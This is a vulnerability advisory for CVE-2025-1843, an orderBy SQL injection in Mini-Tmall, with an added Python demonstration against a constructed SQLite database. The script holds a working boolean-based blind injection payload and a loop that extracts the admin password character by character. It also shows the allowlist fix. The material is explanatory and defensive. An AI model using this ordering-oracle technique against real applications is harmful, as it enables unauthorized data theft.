CVE-2025-1843
Published: 03 March 2025
Description
The sentence below is the MITRE ATT&CK description of T1505 (Server Software Component), to which VulDB maps this issue; the vulnerability itself is summarized in the next section. Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems.
Security Summary
CVE-2025-1843 is a SQL injection vulnerability (CWE-74, CWE-89) in Mini-Tmall, versions up to 20250211. The issue affects the select function in the file com/xq/tmall/dao/ProductMapper.java: manipulation of the orderBy argument leads to SQL injection. Published on 2025-03-03, it carries a CVSS v3.1 base score of 6.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L), which is Medium severity on the CVSS scale, although initial reports describe it as critical.
The vulnerability is exploitable over the network by an authenticated, low-privileged user (PR:L) with low attack complexity and no user interaction. Successful exploitation has a limited (Low) impact on confidentiality, integrity, and availability: injected SQL in the sort expression can read data the user is not authorized to see, alter it, or disrupt the query.
VulDB advisories (ctiid.298109, id.298109) and related submissions document the issue, with a public proof-of-concept exploit disclosed on GitHub (qkdjksfkeg/cve_article/Tmall_demo/SQL%20injection.md). The vendor was contacted early but provided no response, and no patches or official mitigations are referenced.
The exploit has been publicly disclosed and may be used in attacks, increasing risk for unpatched Mini-Tmall deployments.
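The mechanism behind an orderBy finding, as an added example that is neither Mini-Tmall's code nor the GitHub proof of concept: an ORDER BY clause cannot be protected with a bound parameter, because the driver binds the value as a constant sort key and the requested sort is silently ignored. That is why mappers splice the caller's orderBy string into the SQL text (MyBatis ${...} substitution is the usual culprit in a *Mapper.java finding, an assumption here since the advisory does not state it), and that splice is injectable. The script models the vulnerable select against a constructed SQLite schema (the product and user tables, the admin row and its password are made up for the example), shows a boolean-based payload that leaks data through row ordering alone, with no error output needed, and the allowlist that should guard the clause.

```python
import sqlite3

# Added example: models the orderBy injection pattern behind CVE-2025-1843 against a
# constructed SQLite schema. Not Mini-Tmall's real tables, mapper or exploit.

def setup_db():
    """Constructed sample data standing in for a product table and a user table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        INSERT INTO product VALUES (1, 'pen', 30), (2, 'book', 10), (3, 'lamp', 20);
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO user VALUES (1, 'admin', 'Secret42');
    """)
    return conn

def select_vulnerable(conn, order_by):
    """Vulnerable pattern: the caller-controlled sort expression is spliced into the SQL
    text, the same effect as MyBatis ${orderBy} substitution. Returns product ids in
    result order."""
    sql = f"SELECT id, name, price FROM product ORDER BY {order_by}"
    return [row[0] for row in conn.execute(sql)]

def select_bound_parameter(conn, order_by):
    """Why developers reach for string substitution here: a bound parameter in ORDER BY
    is a constant, so every row gets the same sort key and the requested sort is ignored."""
    sql = "SELECT id, name, price FROM product ORDER BY ?"
    return [row[0] for row in conn.execute(sql, (order_by,))]

ALLOWED_COLUMNS = {"id", "name", "price"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}

def validate_order_by(column, direction):
    """Allowlist check: only known column names and directions may reach the SQL text."""
    return column in ALLOWED_COLUMNS and direction.upper() in ALLOWED_DIRECTIONS

def select_hardened(conn, column, direction="ASC"):
    """Hardened pattern: identifiers are taken from the allowlist, never copied from input."""
    if not validate_order_by(column, direction):
        raise ValueError(f"rejected orderBy={column!r} direction={direction!r}")
    sql = f"SELECT id, name, price FROM product ORDER BY {column} {direction.upper()}"
    return [row[0] for row in conn.execute(sql)]

ORDER_BY_PRICE = [2, 3, 1]  # ids sorted by price: book 10, lamp 20, pen 30

def oracle_payload(condition):
    """Boolean-based injection: sort by price if `condition` holds, otherwise by id, so
    the row order tells the attacker the truth value without any error message."""
    return f"(CASE WHEN ({condition}) THEN price ELSE id END)"

def leak_char(conn, position):
    """Binary-search one printable-ASCII character of the admin password through the
    ordering oracle: at most 7 requests per character."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        cond = (f"unicode(substr((SELECT password FROM user WHERE username='admin'),"
                f"{position},1)) > {mid}")
        if select_vulnerable(conn, oracle_payload(cond)) == ORDER_BY_PRICE:
            lo = mid + 1      # character code is above mid
        else:
            hi = mid          # character code is at or below mid
    return chr(lo)

def run_demo():
    """Runs every variant once and returns the observations as a dict."""
    conn = setup_db()
    return {
        "sorted_by_price": select_vulnerable(conn, "price"),
        # Same output whatever column name is bound: the parameter has no effect.
        "bound_param_ignores_value":
            select_bound_parameter(conn, "price") == select_bound_parameter(conn, "id"),
        # Password length (8) assumed known; it could be leaked the same way via length().
        "leaked_password": "".join(leak_char(conn, i) for i in range(1, 9)),
        "hardened_sorted": select_hardened(conn, "price", "desc"),
        "payload_rejected": not validate_order_by(oracle_payload("1=1"), "ASC"),
    }

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The fix is an allowlist on identifiers, not escaping: ORDER BY takes an identifier or expression, and the quoting that protects string literals does nothing there. The oracle needs no error output and no elevated role, only a product listing that honours the sort parameter, which is consistent with the PR:L rating above.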
Details
- CWE(s): CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')), CWE-89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'))
Affected Products
Mini-Tmall, versions up to 20250211
MITRE ATT&CK Enterprise Techniques
T1190 (Exploit Public-Facing Application), T1505 (Server Software Component)
Why these techniques?
SQL injection through the orderBy parameter of Mini-Tmall's ProductMapper.java, reachable over the network by a low-privileged user (PR:L) of the public-facing web application, is exploitation of a public-facing application (T1190). VulDB additionally maps the issue to abuse of server software components (T1505).